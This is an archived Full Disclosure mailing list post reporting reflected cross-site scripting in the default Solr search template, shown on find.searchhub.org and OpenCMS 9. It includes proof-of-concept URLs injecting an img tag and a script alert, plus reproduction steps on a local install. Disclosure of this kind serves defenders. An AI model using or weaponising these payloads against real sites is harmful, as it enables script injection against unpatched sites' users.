[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] XSS - find.searchhub.org, opencms version9 and others

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] XSS - find.searchhub.org, opencms version9 and others
From: jkmac@xxxxxxxxxxxxx
Date: Tue, 20 May 2014 16:23:37 -0400

Hello,

the  default search template for solr  is prone for XSS, because nobody 
validated  the input.

PoC:
http://find.searchhub.org/?q=%3Cimg+src%3D%27http%3A%2F%2Fc.s-microsoft.com%2Fnl-nl%2FCMSImages%2Fmslogo.png%3Fversion%3D856673f8-e6be-0476-6669-d5bf2300391d%27%3E
http://find.searchhub.org/?q=%3Cscript%3Ealert%28%27foo%27%29%3C%2Fscript%3E

This  is also valid for any opencms website that uses the solr search, e.g. the 
default opencms search template based on solr in opencms version 9. E.g. point 
your browser to http://localhost:8080/opencms/opencms/demo/search-page/  and 
search for 
<img 
src='http://c.s-microsoft.com/nl-nl/CMSImages/mslogo.png?version=856673f8-e6be-0476-6669-d5bf2300391d'>
  

That might not be a solr issue, but an implementation one. 

Regards.

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] Beginners error: Hewlett-Packards driver software executes rogue binary C:\Program.exe
Next by Date: Re: [FD] A way to trigger CVE-2014-1322 (userspace read kernel pointer)?
Previous by thread: Re: [FD] Beginners error: Hewlett-Packards driver software executes rogue binary C:\Program.exe
Next by thread: [FD] SEC Consult SA-20140521-0 :: Multiple critical vulnerabilities in CoSoSys Endpoint Protector 4
Index(es):
- Date
- Thread